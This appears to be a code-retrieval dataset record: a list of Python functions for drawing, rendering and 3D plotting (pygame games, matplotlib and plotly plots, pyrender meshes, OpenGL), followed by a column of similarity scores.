"def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def imshow_mesh_3d(img, vertices, faces, camera_center, focal_length, colors=(76, 76, 204)):\n H, W, C = img.shape\n if not has_pyrender:\n warnings.warn('pyrender package is not installed.')\n return img\n if not has_trimesh:\n warnings.warn('trimesh package is not installed.')\n return img\n try:\n renderer = pyrender.OffscreenRenderer(viewport_width=W, viewport_height=H)\n except (ImportError, RuntimeError):\n warnings.warn('pyrender package is not installed correctly.')\n return img\n if not isinstance(colors, list):\n colors = [colors for _ in range(len(vertices))]\n colors = [color_val(c) for c in colors]\n depth_map = np.ones([H, W]) * np.inf\n output_img = img\n for idx in range(len(vertices)):\n color = colors[idx]\n color = [(c / 255.0) for c in color]\n color.append(1.0)\n vert = vertices[idx]\n face = faces[idx]\n material = pyrender.MetallicRoughnessMaterial(metallicFactor=0.2, alphaMode='OPAQUE', baseColorFactor=color)\n mesh = trimesh.Trimesh(vert, face)\n rot = trimesh.transformations.rotation_matrix(np.radians(180), [1, 0, 0])\n mesh.apply_transform(rot)\n mesh = pyrender.Mesh.from_trimesh(mesh, material=material)\n scene = pyrender.Scene(ambient_light=(0.5, 0.5, 0.5))\n scene.add(mesh, 'mesh')\n camera_pose = np.eye(4)\n camera = pyrender.IntrinsicsCamera(fx=focal_length[0], fy=focal_length[1], cx=camera_center[0], cy=camera_center[1], zfar=100000.0)\n scene.add(camera, pose=camera_pose)\n light = pyrender.DirectionalLight(color=[1.0, 1.0, 1.0], intensity=1)\n light_pose = np.eye(4)\n light_pose[:3, 3] = np.array([0, -1, 1])\n scene.add(light, pose=light_pose)\n light_pose[:3, 3] = np.array([0, 1, 1])\n scene.add(light, pose=light_pose)\n light_pose[:3, 3] = np.array([1, 1, 2])\n scene.add(light, pose=light_pose)\n color, rend_depth = renderer.render(scene, flags=pyrender.RenderFlags.RGBA)\n valid_mask = (rend_depth < depth_map) * (rend_depth > 0)\n depth_map[valid_mask] = rend_depth[valid_mask]\n valid_mask = valid_mask[:, :, None]\n output_img = valid_mask * color[:, :, :3] + (1 - valid_mask) * output_img\n return output_img", "def draw(self):\r\n arcade.draw_circle_filled(self.center.x, self.center.y, BULLET_RADIUS, BULLET_COLOR)", "def draw():\n clear()\n\n for target in targets:\n goto(target.x, target.y)\n dot(20, \"blue\")\n\n if inside(ball):\n goto(ball.x, ball.y)\n dot(6, \"red\")\n\n update()", "def on_draw(self):\n\n # clear the screen to begin drawing\n arcade.start_render()\n\n # TODO: draw each object\n self.ship.draw()\n for asteroid in self.asteroid_array:\n asteroid.draw()\n\n for bullet in self.bullets_list:\n bullet.draw()", "def display(self):\n\n self.screen.fill(self.background)\n\n for wireframe in self.wireframes.values():\n if self.displayEdges:\n for n1, n2 in wireframe.edges:\n pygame.draw.aaline(self.screen, self.edgeColour, wireframe.nodes[n1][:2], wireframe.nodes[n2][:2], 1)\n\n if self.displayNodes:\n for node in wireframe.nodes:\n 
pygame.draw.circle(self.screen, self.nodeColour, (int(node[0]), int(node[1])), self.nodeRadius, 0)", "def on_render(self):\n\n # set text font for in visualization\n pygame.font.init()\n font = pygame.font.SysFont('Arial', 24)\n\n # continue running algorithm until done\n if self.algorithm.isDone is False:\n self.algorithm.execute()\n\n # draw background\n for i in range(0, 3):\n for j in range(0, 3):\n self.screen.blit(self.img_grass, (i * 270, j * 270))\n\n # get water instances to draw and draw them\n allWatersList = []\n allWatersList.extend(self.area.allWatersList)\n\n for water in allWatersList:\n pygame.draw.rect(\n self.screen, (0, 0, 128),\n (water.x * 2,\n water.y * 2,\n water.width * 2,\n water.height * 2)\n )\n pygame.draw.rect(\n self.screen,\n (0, 0, 0),\n (0, self.height-50, self.width, 50)\n )\n\n # get house instances to draw and draw them\n housesToPlace = []\n housesToPlace.extend(self.area.mansionList)\n housesToPlace.extend(self.area.familyHomeList)\n housesToPlace.extend(self.area.bungalowList)\n\n for house in housesToPlace:\n # draw free space\n space = pygame.Surface((house.space * 4 + house.width * 2,\n house.space * 4 + house.height * 2))\n space.set_alpha(64)\n space.fill((180, 0, 0))\n self.screen.blit(space,\n (house.x * 2 - house.space * 2,\n house.y * 2 - house.space * 2))\n\n # draw minimum free space\n space = pygame.Surface((house.minimumSpace * 4 + house.width * 2,\n house.minimumSpace * 4 + house.height * 2))\n space.set_alpha(110)\n space.fill((100, 0, 0))\n self.screen.blit(space,\n (house.x * 2 - house.minimumSpace * 2,\n house.y * 2 - house.minimumSpace * 2))\n\n for house in housesToPlace:\n # draw house, colored based on type\n kind = type(house).__name__\n if kind == \"Mansion\":\n pygame.draw.rect(self.screen,\n (200, 255, 40),\n (house.x * 2,\n house.y * 2,\n house.width * 2,\n house.height * 2))\n elif kind == \"Bungalow\":\n pygame.draw.rect(self.screen,\n (255, 40, 200),\n (house.x * 2,\n house.y * 2,\n house.width * 2,\n house.height * 2))\n elif kind == \"FamilyHome\":\n pygame.draw.rect(self.screen,\n (0, 255, 0),\n (house.x * 2,\n house.y * 2,\n house.width * 2,\n house.height * 2))\n\n # Draw black bar at bottom of screen for extra info\n pygame.draw.rect(self.screen,\n (0, 0, 0),\n (0, self.height - 50, self.width, 50))\n\n # Draw area value and last value increase in infobox\n textSurface = font.render('Score: '\n + str(self.area.price),\n True, (255, 255, 255))\n self.screen.blit(textSurface, (10, self.height-35))\n\n # create distinct color for value decreases\n increaseColor = (255, 255, 255)\n if (self.area.price - self.lastPrice < 1):\n increaseColor = (80, 80, 80)\n textSurface = font.render('Increase: ' +\n str(self.area.price - self.lastPrice),\n True, increaseColor)\n self.screen.blit(textSurface, (330, self.height-35))\n pygame.draw.rect(self.screen,\n (0, 0, 0),\n (640, 0, 400, self.height))\n\n # save area values to draw graph\n if (self.area.price >= self.lastPrice and\n self.algorithm.isDone is False and\n self.showDecrease is False):\n\n self.scores.append(self.area.price)\n self.lastPrice = self.area.price\n\n if self.showDecrease is True and self.algorithm.isDone is False:\n self.scores.append(self.area.price)\n self.lastPrice = self.area.price\n\n # draw graph with area values\n fig = pylab.figure(figsize=[4, 4], # Inches\n dpi=100) # 100 dots per inch\n ax = fig.gca()\n ax.plot(self.scores)\n\n canvas = agg.FigureCanvasAgg(fig)\n canvas.draw()\n renderer = canvas.get_renderer()\n raw_data = 
renderer.tostring_rgb()\n\n surf = pygame.image.fromstring(raw_data, (400, 400), \"RGB\")\n self.screen.blit(surf, (640, 0))\n matplotlib.pyplot.close(fig)\n\n # Draw all time highest score if that's set\n if self.allTimeHigh is not 0:\n textSurface = font.render('Highest score: ' +\n str(self.allTimeHigh),\n True, (255, 255, 255))\n self.screen.blit(textSurface, (650, 410))\n\n pygame.display.flip()\n pass", "def visualize_scan(self):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(self.p1_points[:, 0], self.p1_points[:, 1], self.p1_points[:, 2], c='r')\n ax.scatter(self.p2_points[:, 0], self.p2_points[:, 1], self.p2_points[:, 2], c='g')\n ax.scatter(self.p3_points[:, 0], self.p3_points[:, 1], self.p3_points[:, 2], c='b')\n ax.scatter(self.p4_points[:, 0], self.p4_points[:, 1], self.p4_points[:, 2])\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n plt.show()", "def construct3by3(listOfDBZs, showCoast=True, \n plotCentroidTrajectory=True, # this parameter and below added 2013-11-18\n DBZstream=\"\",\n verbose=False,\n ): #\n from armor.geometry.frames import setSideBySide, setUpDown\n L = listOfDBZs #alias\n #print [type(v) for v in L] #debug\n #time.sleep(3) #debug\n #L = [v for v in L if isinstance(v, dbz)]\n for im in L:\n if not isinstance(im.matrix, np.ma.MaskedArray):\n im.matrix = np.ma.array(im.matrix)\n im.load()\n im.setThreshold(0)\n if plotCentroidTrajectory:\n im.matrix= im.shortTermTrajectory(hours=6, timeInterval=3, radius=40, verbose=verbose, drawCoast=showCoast).matrix\n im.drawFrame(intensity=9999)\n #im.show()\n #im.showWithCoast(intensity=68)\n #if showCoast:\n # im.drawCoast(intensity=9999)\n #im.show()\n\n #debug\n #print L\n #print L.name\n #print '\\n'.join([v.name for v in L])\n #time.sleep(1)\n #print \"shapes for L[5], L[0], L[6]:\", L[5].matrix.shape, L[0].matrix.shape, L[6].matrix.shape\n #debug end\n if len(L) < 9:\n for i in range(9-len(L)):\n L.append(dbz(name='', matrix=L[0].matrix*0))\n #print [type(v) for v in L] #debug\n #time.sleep(3) #debug\n #L = [v for v in L if isinstance(v, dbz)]\n\n a = setSideBySide(L[1:4])\n b = setSideBySide([L[4],L[0],L[5]]) #bug fixed 2013-11-22\n c = setSideBySide(L[6:9])\n #output = setUpDown([a,b,c])\n output = setUpDown([c, b, a]) # 2013-11-22 \n output.name = L[1].name + ', ' + L[2].name + ', ' + L[3].name + '\\n' +\\\n L[4].name + ', ' + L[0].name + ', ' + L[5].name + '\\n' +\\\n L[6].name + ', ' + L[7].name + ', ' + L[8].name\n return output", "def __c3dSeg(self, bg, seg, tgPng, scale, opacity):\n for axes in ['x', 'y', 'z']:\n cmd = 'c3d ' + bg + ' -scale ' + scale + ' ' + seg + ' '\n cmd += '-foreach -slice ' + axes + ' 50% -endfor '\n cmd += '-oli ' + os.path.join(self.toadDir, \"templates/lookup_tables/\") + 'FreeSurferColorLUT_ItkSnap.txt ' + opacity + ' -type uchar -omc ' + axes + '.png'\n self.launchCommand(cmd)\n cmd = 'pngappend x.png + y.png + z.png ' + tgPng\n self.launchCommand(cmd)\n cmd = 'rm x.png y.png z.png'\n self.launchCommand(cmd)", "def show_skeletons(self, skel_2d, z_out, z_gt=None):\n fig = plt.figure(figsize=(20, 20))\n ax1 = fig.add_subplot(1, 2, 1)\n ax2 = fig.add_subplot(1, 2, 2, projection='3d')\n edges = np.array([[1, 0], [0, 2],[2, 3], [3, 4], [0, 5], [5, 6], [6, 7]])\n\n ax_2d = ax1\n ax_3d = ax2\n\n # draw 3d\n for edge in edges:\n ax_3d.plot(skel_2d[0, edge], z_out[edge], skel_2d[1, edge], color='r')\n if z_gt is not None:\n ax_3d.plot(skel_2d[0, edge], z_gt[edge], skel_2d[1, edge], color='g')\n\n ax_3d.set_aspect('equal')\n 
ax_3d.set_xlabel(\"x\"), ax_3d.set_ylabel(\"z\"), ax_3d.set_zlabel(\"y\")\n ax_3d.set_xlim3d([-2, 2]), ax_3d.set_ylim3d([2, -2]), ax_3d.set_zlim3d([2, -2])\n ax_3d.view_init(elev=10, azim=-45)\n\n # draw 2d\n for edge in edges:\n ax_2d.plot(skel_2d[0, edge], skel_2d[1, edge], color='r')\n\n ax_2d.set_aspect('equal')\n ax_2d.set_xlabel(\"x\"), ax_2d.set_ylabel(\"y\")\n ax_2d.set_xlim([-2, 2]), ax_2d.set_ylim([2, -2])\n\n plt.show()", "def full_3d(self, quantity):\n # The data just tells you what integer grid point you are on. Not what actual x,y coordinate you\n # are at\n x = np.arange(0, self.period, self.dx)\n y = np.arange(0, self.period, self.dy)\n z = np.arange(0, self.height + self.dz, self.dz)\n points = np.array(list(itertools.product(z, x, y)))\n # Get the scalar\n scalar = self.get_scalar_quantity(quantity)\n labels = ('X [um]', 'Y [um]', 'Z [um]', quantity)\n # Now plot!\n self.scatter3d(points[:, 1], points[:, 2], points[\n :, 0], scalar.flatten(), labels, 'full_3d')", "def drawBoard(self):\r\n self.outer.draw(self.surface)\r\n self.background.draw(self.surface)\r\n for point in self.points:\r\n point.draw(self.surface)\r\n point.drawCheckers(self.surface)\r\n self.dice.draw(self.surface)\r\n self.message.draw(self.surface)\r\n self.checkerBox.draw(self.surface)\r\n self.checkerBox.drawCheckers(self.surface)\r\n for bar in self.bar:\r\n bar.draw(self.surface)\r\n bar.drawCheckers(self.surface)\r\n pygame.display.flip()", "def draw(self):", "def show_vertex_colors():\n if bpy.app.version > (2, 80, 0):\n for area in bpy.context.screen.areas:\n if area.type == 'VIEW_3D':\n for space in area.spaces:\n if space.type == 'VIEW_3D':\n space.shading.type = 'SOLID'\n space.shading.color_type = 'VERTEX'", "def force_show(sub_Idx):\n force_path = './dataset/subj_' + f'{sub_Idx:02d}'+ '/forces/force_' + f'{sub_Idx:02d}' + '.txt'\n image_path = './dataset/subj_' + f'{sub_Idx:02d}'+ '/images/'\n force_num = len(glob.glob(image_path + '*.jpg'))\n force_list = load_force_txt(force_path,force_num)\n print('showing '+f'{force_num:03d}'+ ' raw forces for subject ' + f'{sub_Idx:02d}')\n\n fig = plt.figure(figsize = (10, 7)) \n ax = plt.axes(projection =\"3d\") \n\n for x, y, z in force_list:\n ax.scatter3D(x, y, z, color = \"green\")\n ax.set_xlabel('X-axis', fontweight ='bold') \n ax.set_ylabel('Y-axis', fontweight ='bold') \n ax.set_zlabel('Z-axis', fontweight ='bold')\n plt.title(\"3D force data\") \n plt.show()", "def draw(self):\n #for (x, y) in self.coords:\n # pyxel.rect(\n # (x + self.x) * 4,\n # (y + self.y) * 4,\n # (x + self.x) * 4 + 3,\n # (y + self.y) * 4 + 3,\n # self.color)", "def render(self):\n\n theta = self.angle*math.pi/180.0\n cth = math.cos(theta)\n sth = math.sin(theta)\n pts = []\n cornerpts = []\n\n for vertex in self.points:\n x = vertex[0] + self.pos[0] - self.anchor[0]\n y = vertex[1] + self.pos[1] - self.anchor[1]\n\n xt = x * cth - y * sth\n yt = x * sth + y * cth\n\n x = xt + self.anchor[0]\n y = yt + self.anchor[1]\n\n cornerpts.append([x,y])\n pts.append(gr.Point(self.scale * x, self.win.getHeight() - self.scale*y))\n\n self.corners = cornerpts\n self.vis = [gr.Polygon(pts)]", "def render(self):\r\n super().render()\r\n layers, titles, latVect, lonVect = self.make_layers()\r\n LON, LAT = np.meshgrid(lonVect, latVect)\r\n lon = LON.flatten()\r\n lat = LAT.flatten()\r\n for i in range(len(layers)):\r\n vals = layers[i].flatten()\r\n hovertext = []\r\n for k in range(len(vals)):\r\n hovertext.append('lon: {:.2f}<br>lat: {:.2f}<br>{}: {:.1e}'.format(lon[k], lat[k], 
self.variable + self.unit,vals[k]))\r\n if self.levels == 0:\r\n data = [\r\n go.Heatmap(\r\n x=lon,\r\n y=lat,\r\n z=vals,\r\n colorscale=self.cmap,\r\n zmin=self.vmin,\r\n zmax=self.vmax,\r\n hoverinfo='text',\r\n text=hovertext \r\n )\r\n ]\r\n elif self.levels > 0:\r\n data = [\r\n go.Contour(\r\n x=lon,\r\n y=lat,\r\n z=vals,\r\n colorscale=self.cmap,\r\n hoverinfo='text',\r\n text=hovertext, \r\n connectgaps=False,\r\n contours=dict(\r\n coloring='heatmap',\r\n showlabels=True,\r\n start=self.vmin,\r\n end=self.vmax,\r\n size=(self.vmax-self.vmin) / float(self.levels)\r\n )\r\n # line=dict(smoothing=0.85) \r\n )\r\n ] \r\n\r\n\r\n layout = go.Layout(\r\n autosize=False,\r\n title=titles[i],\r\n width=self.width,\r\n height=self.height,\r\n xaxis={'title': self.xlabel},\r\n yaxis={'title': self.ylabel}\r\n ) \r\n\r\n\r\n\r\n if self.surface3D:\r\n data = [\r\n go.Surface(\r\n x=lonVect,\r\n y=latVect,\r\n z=layers[i],\r\n colorscale=self.cmap,\r\n # hoverinfo='text',\r\n # text=hovertext \r\n )\r\n ]\r\n\r\n layout = go.Layout(\r\n autosize=False,\r\n title=titles[i],\r\n width=self.width,\r\n height=self.height,\r\n scene = dict(\r\n xaxis={'title': self.xlabel},\r\n yaxis={'title': self.ylabel},\r\n zaxis={'title': self.variable + self.unit}\r\n )\r\n ) \r\n\r\n\r\n self._save_plotly_(go, data, layout)", "def plots(x_bef,y_bef,z_bef):\r\n # Makes a 3-D plot of the x, y and z axes representing the ball's total trajectory\r\n plt.figure(3)\r\n plot3 = plt.axes(projection=\"3d\")\r\n plot3.plot3D(x_bef,y_bef,z_bef,'blue')\r\n plot3.set_xlabel('x (ft)')\r\n plot3.set_ylabel('y (ft)')\r\n plot3.set_zlabel('z (ft)')\r\n plot3.set_title('Total Trajectory')\r\n \r\n # Makes a 2-D plot of the x, and z axes representing the ball's total 2-D trajectory\r\n plt.figure(4)\r\n plt.plot(x_bef,z_bef)\r\n plt.xlabel('x (ft)')\r\n plt.ylabel('z (ft)')\r\n plt.title('z (ft) vs x (ft)')\r\n plt.show()", "def draw():\n screen.fill((0, 0, 0))\n alien.draw()", "def cube_vertices(x, y, z, n):\n #def cube_vertices(self):\n # \"\"\" Return the vertices of the cube at position x, y, z with size 2*n.\n #\n # \"\"\"\n # return [\n # x-n,y+n,z-n, x-n,y+n,z+n, x+n,y+n,z+n, x+n,y+n,z-n, # top\n # x-n,y-n,z-n, x+n,y-n,z-n, x+n,y-n,z+n, x-n,y-n,z+n, # bottom\n # x-n,y-n,z-n, x-n,y-n,z+n, x-n,y+n,z+n, x-n,y+n,z-n, # left\n # x+n,y-n,z+n, x+n,y-n,z-n, x+n,y+n,z-n, x+n,y+n,z+n, # right\n # x-n,y-n,z+n, x+n,y-n,z+n, x+n,y+n,z+n, x-n,y+n,z+n, # front\n # x+n,y-n,z-n, x-n,y-n,z-n, x-n,y+n,z-n, x+n,y+n,z-n, # back\n # ]\n return [\n x-n,y+n,z-n, x-n,y+n,z+n, x+n,y+n,z+n, x+n,y+n,z-n, # top\n x-n,y-n,z-n, x+n,y-n,z-n, x+n,y-n,z+n, x-n,y-n,z+n, # bottom\n x-n,y-n,z-n, x-n,y-n,z+n, x-n,y+n,z+n, x-n,y+n,z-n, # left\n x+n,y-n,z+n, x+n,y-n,z-n, x+n,y+n,z-n, x+n,y+n,z+n, # right\n x-n,y-n,z+n, x+n,y-n,z+n, x+n,y+n,z+n, x-n,y+n,z+n, # front\n x+n,y-n,z-n, x-n,y-n,z-n, x-n,y+n,z-n, x+n,y+n,z-n, # back\n ]", "def draw(self, view):\n self._wall.draw(view)\n self._paddle.draw(view)\n self._ball.draw(view)", "def draw3DPts(pcl_1, pcl_2=None, color_1=None, color_2=None):\n input_size_1 = list(pcl_1.size() )\n B = input_size_1[0]\n C = input_size_1[1]\n N1 = input_size_1[2]\n if pcl_2 is not None:\n input_size_2 = list(pcl_2.size() )\n N2 = input_size_2[2]\n\n pcl_1_cpu = pcl_1.cpu().numpy()\n if pcl_2 is not None:\n pcl_2_cpu = pcl_2.cpu().numpy()\n if color_1 is not None:\n color_1_cpu = color_1.cpu().numpy()\n else:\n color_1_cpu = None\n if color_2 is not None:\n color_2_cpu = color_2.cpu().numpy()\n else:\n color_2_cpu = None\n \n 
\n for i in range(B):\n # fig = plt.figure(i)\n # ax = fig.gca(projection='3d')\n # plt.cla()\n\n pcd_o3d_1 = np_batch_to_o3d_pcd(i, pcl_1_cpu, color_1_cpu)\n\n if pcl_2 is not None:\n pcd_o3d_2 = np_batch_to_o3d_pcd(i, pcl_2_cpu, color_2_cpu)\n draw_pcls(pcd_o3d_1, pcd_o3d_2, uniform_color=color_1 is None)\n else:\n draw_pcls(pcd_o3d_1, uniform_color=color_1 is None)\n\n # plt.axis('equal')\n # plt.show()\n # plt.gca().set_aspect('equal')\n # plt.gca().set_zlim(-10, 10)\n # plt.gca().set_zlim(0, 3.5)", "def viewer(\n self, units='nm', \n draw_edges=True, draw_vertices=True,\n color_by='radius'\n ):\n try:\n import matplotlib.pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D \n from matplotlib import cm\n except ImportError:\n print(\"Skeleton.viewer requires matplotlib. Try: pip install matplotlib --upgrade\")\n return\n\n RADII_KEYWORDS = ('radius', 'radii', 'r')\n COMPONENT_KEYWORDS = ('component', 'components', 'c')\n\n fig = plt.figure(figsize=(10,10))\n ax = Axes3D(fig)\n ax.set_xlabel(units)\n ax.set_ylabel(units)\n ax.set_zlabel(units)\n\n # Set plot axes equal. Matplotlib doesn't have an easier way to\n # do this for 3d plots.\n X = self.vertices[:,0]\n Y = self.vertices[:,1]\n Z = self.vertices[:,2]\n\n max_range = np.array([X.max()-X.min(), Y.max()-Y.min(), Z.max()-Z.min()]).max() / 2.0\n\n mid_x = (X.max()+X.min()) * 0.5\n mid_y = (Y.max()+Y.min()) * 0.5\n mid_z = (Z.max()+Z.min()) * 0.5\n ax.set_xlim(mid_x - max_range, mid_x + max_range)\n ax.set_ylim(mid_y - max_range, mid_y + max_range)\n ax.set_zlim(mid_z - max_range, mid_z + max_range)\n ### END EQUALIZATION CODE ###\n\n component_colors = ['k', 'deeppink', 'dodgerblue', 'mediumaquamarine', 'gold' ]\n\n def draw_component(i, skel):\n component_color = component_colors[ i % len(component_colors) ]\n\n if draw_vertices:\n xs = skel.vertices[:,0]\n ys = skel.vertices[:,1]\n zs = skel.vertices[:,2]\n\n if color_by in RADII_KEYWORDS:\n colmap = cm.ScalarMappable(cmap=cm.get_cmap('rainbow'))\n colmap.set_array(skel.radii)\n\n normed_radii = skel.radii / np.max(skel.radii)\n yg = ax.scatter(xs, ys, zs, c=cm.rainbow(normed_radii), marker='o')\n cbar = fig.colorbar(colmap)\n cbar.set_label('radius (' + units + ')', rotation=270)\n elif color_by in COMPONENT_KEYWORDS:\n yg = ax.scatter(xs, ys, zs, color=component_color, marker='.')\n else:\n yg = ax.scatter(xs, ys, zs, color='k', marker='.')\n\n if draw_edges:\n for e1, e2 in skel.edges:\n pt1, pt2 = skel.vertices[e1], skel.vertices[e2]\n ax.plot( \n [ pt1[0], pt2[0] ],\n [ pt1[1], pt2[1] ],\n zs=[ pt1[2], pt2[2] ],\n color=(component_color if not draw_vertices else 'silver'),\n linewidth=1,\n )\n\n if color_by in COMPONENT_KEYWORDS:\n for i, skel in enumerate(self.components()):\n draw_component(i, skel)\n else:\n draw_component(0, self)\n\n plt.show()", "def plot_all(self) -> None:\n self.__plot_si_cf_plane()\n self.__plot_convex_hull()\n self.__plot_fixed_radius()\n self.__plot_delaunay()", "def plot(self, plotEdges=False, emphaseEdges=[], col=('b', 'k', 'r'), lims=None, ort=False):\n ax = a3.Axes3D(plt.figure())\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n ax.dist = 30\n ax.azim = -140\n if lims is None:\n lims = [0, 0, 0]\n lims[0] = [min(v.x for v in self.vertices),\n max(v.x for v in self.vertices)]\n lims[1] = [min(v.y for v in self.vertices),\n max(v.y for v in self.vertices)]\n lims[2] = [min(v.z for v in self.vertices),\n max(v.z for v in self.vertices)]\n if ort:\n ma = max(lims[i][1] for i in range(3))\n mi = min(lims[i][0] for i in range(3))\n 
lims = [[mi, ma]] * 3\n ax.set_xlim(lims[0])\n ax.set_ylim(lims[1])\n ax.set_zlim(lims[2])\n for f in self.faces:\n face = a3.art3d.Poly3DCollection([[v.coords()\n for v in f.vertices]])\n ax.add_collection3d(face)\n face.set_facecolor(col[0])\n face.set_edgecolor(col[1])\n if plotEdges or len(emphaseEdges)>0:\n for e in self.edges:\n edge = a3.art3d.Poly3DCollection([[e.nvt.coords(),\n e.pvt.coords()]])\n ax.add_collection3d(edge)\n if e in emphaseEdges:\n edge.set_edgecolor(col[2])\n else:\n edge.set_edgecolor(col[1])\n plt.show()", "def drawFace():\r\n\tglPushMatrix()\r\n\tglTranslatef(-0.5,-0.5,0)\r\n\tglBegin(GL_LINE_LOOP)\r\n\t\r\n\tglVertex3f(0,VALUE,0)\r\n\tglVertex3f(VALUE,0,0)\r\n\t\r\n\tglVertex3f(LENGTH-VALUE,0,0)\r\n\tglVertex3f(LENGTH,VALUE,0)\r\n\t\r\n\tglVertex3f(LENGTH,LENGTH-VALUE,0)\r\n\tglVertex3f(LENGTH-VALUE,LENGTH,0)\r\n\t\r\n\tglVertex3f(VALUE,LENGTH,0)\r\n\tglVertex3f(0,LENGTH-VALUE,0)\r\n\t\r\n\tglEnd()\r\n\tglPopMatrix()", "def c_3D(G, nombre):\n print(\"Pasando grafo a formato tridimensional...\")\n aDir = os.getcwd()\n d = dict(G.degree)\n \n Nodes = list(G.nodes)\n N = len(Nodes)\n Edges = pasar_na_num(G)\n\n Grafo = ig.Graph(Edges, directed=True)\n layt = Grafo.layout('kk', dim=3)\n Xn = [layt[k][0] for k in range(N)] # x-coordinates of nodes\n Yn = [layt[k][1] for k in range(N)] # y-coordinates\n Zn = [layt[k][2] for k in range(N)] # z-coordinates\n Xe = []\n Ye = []\n Ze = []\n\n for e in Edges:\n Xe += [layt[e[0]][0], layt[e[1]][0], None] # x-coordinates of edge ends\n Ye += [layt[e[0]][1], layt[e[1]][1], None]\n Ze += [layt[e[0]][2], layt[e[1]][2], None]\n\n trace1 = go.Scatter3d(x=Xe,\n y=Ye,\n z=Ze,\n mode='lines',\n line=go.scatter3d.Line(\n color=\"black\",\n colorscale=\"Blues\",\n width=3\n ),\n hoverinfo='none'\n )\n\n trace2 = go.Scatter3d(x=Xn,\n y=Yn,\n z=Zn,\n mode='markers',\n name='notes and chords',\n marker=dict(symbol='circle',\n size=6,\n color=list(d.values()),\n colorscale='Greens',\n line=dict(color='rgb(50,50,50)', width=0.5)\n ),\n text=Nodes,\n hoverinfo=\"text\"\n )\n\n axis = dict(showbackground=False,\n showline=False,\n zeroline=False,\n showgrid=False,\n showticklabels=False,\n title=''\n )\n\n layout = go.Layout(\n title=\"Grafo de la partitura {0}\".format(nombre),\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n width=1000,\n height=1000,\n showlegend=False,\n scene=dict(\n xaxis=dict(axis),\n yaxis=dict(axis),\n zaxis=dict(axis),\n ),\n margin=dict(\n t=100\n ),\n hovermode='closest',\n )\n\n data = [trace1, trace2]\n figure = go.Figure(data=data, layout=layout)\n figure.write_html(\"{0}/3DGraphs/3D_Graph_{1}.html\".format(aDir,nombre))\n print(\"Listo.\")\n figure.show()", "def render_3d(projection, **kwds):\n if isinstance(projection, Polyhedron): projection = Projection(projection)\n return \\\n projection.render_vertices_3d(width=3, color='green', **kwds) +\\\n projection.render_wireframe_3d(width=3, color='green', **kwds) + \\\n projection.render_solid_3d(**kwds)" ]
[ "0.67704284", "0.6621511", "0.6335428", "0.62092894", "0.612173", "0.6121571", "0.6106901", "0.60958236", "0.6095626", "0.6073754", "0.60695255", "0.60470665", "0.6022389", "0.60214126", "0.6004602", "0.5997901", "0.5991583", "0.5977998", "0.59440416", "0.59368646", "0.59315884", "0.59279937", "0.59252447", "0.59048986", "0.5894956", "0.58754414", "0.5870859", "0.586726", "0.5861615", "0.58570975", "0.5853422", "0.5817661", "0.5803974", "0.5792202", "0.5784058", "0.57831466", "0.57784176", "0.5777871", "0.5773006", "0.5771206", "0.5762533", "0.5736443", "0.57299304", "0.5724259", "0.57127875", "0.5708261", "0.57042485", "0.5693814", "0.5676734", "0.56591415", "0.56518304", "0.5640212", "0.5609678", "0.5581681", "0.558094", "0.5577973", "0.5566226", "0.5565511", "0.5562278", "0.5560169", "0.55594456", "0.5558807", "0.554439", "0.55435884", "0.55435884", "0.55435884", "0.55435884", "0.55435884", "0.55435884", "0.55435884", "0.55435884", "0.55382013", "0.55342454", "0.55189764", "0.55171525", "0.5504374", "0.5501347", "0.5501319", "0.5498615", "0.5498137", "0.5487336", "0.5486955", "0.54859585", "0.5475209", "0.5460329", "0.54576826", "0.545477", "0.545151", "0.5446897", "0.5433189", "0.5429748", "0.54296994", "0.54285264", "0.5426068", "0.541877", "0.540232", "0.54009116", "0.5390817", "0.53828835", "0.5376878" ]
0.6539542
2
thermodynamic estimator of the kinetic energy
def thermodynamic_kinetic(paths,lam,tau):
    nslice,nptcl,ndim,nconf = paths.shape
    ke = ndim*nptcl/2./tau * np.ones(nconf)
    for islice in range(nslice):
        r2_arr = (paths[islice]-paths[(islice+1)%nslice])**2. # (nptcl,ndim,nconf)
        r2 = r2_arr.sum(axis=0).sum(axis=0) # (nconf,)
        ke -= r2/(4.*lam*tau**2.)/nslice
    return ke
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def price_heston_mc(kappa_,theta_,sigma_,rho_,r_,T_,L_,V0_,S0_,K0_,N_):\r\n esp_ = monte_carlo(kappa_,theta_,sigma_,rho_,r_,T_,L_,V0_,S0_,K0_,N_)\r\n return exp(-r_*T_)*esp_", "def kineticEnergy(self):\n return self.params['kinetic']", "def energyK(k):\r\n C1 = 9.7846113e-07\r\n C2 = 12.263868e0 \r\n E = (-1.0 + np.sqrt(1.0 + 4.0 * C1 * C2**2 * k**2))/(2.0 * C1)\r\n return E", "def _UpdateEnergy(self):\n self.mol.GetEnergy('nokinetic')", "def kinetic_energy(self):\r\n return self.mass * np.dot(self.vel, self.vel) / 2", "def kinetic_energy(self, sys):\n v = sys.velocities\n m = sys.mass\n return 0.5*np.dot(m, np.multiply(v, v))", "def energy_function(self, x):\n \n return -T.dot(T.transpose(x), T.dot(self.W, x)) -\\\n T.dot(T.transpose(self.b), x)", "def get_E(J,k):\n E = -2 * J * np.cos(k) # energyeigenvalue \n return E", "def _k(self, T):\n RT = Rgas * T\n return (self.parameters.A1 / np.exp(self.parameters.E1 / RT),\n self.parameters.A2 / np.exp(self.parameters.E2 / RT))", "def calculate_ttw_energy(self) -> None:\n\n self.energy = self.ecm.motive_energy_per_km(\n driving_mass=self[\"driving mass\"],\n rr_coef=self[\"rolling resistance coefficient\"],\n drag_coef=self[\"aerodynamic drag coefficient\"],\n frontal_area=self[\"frontal area\"],\n electric_motor_power=self[\"electric power\"],\n engine_power=self[\"power\"],\n recuperation_efficiency=self[\"recuperation efficiency\"],\n aux_power=self[\"auxiliary power demand\"],\n battery_charge_eff=self[\"battery charge efficiency\"],\n battery_discharge_eff=self[\"battery 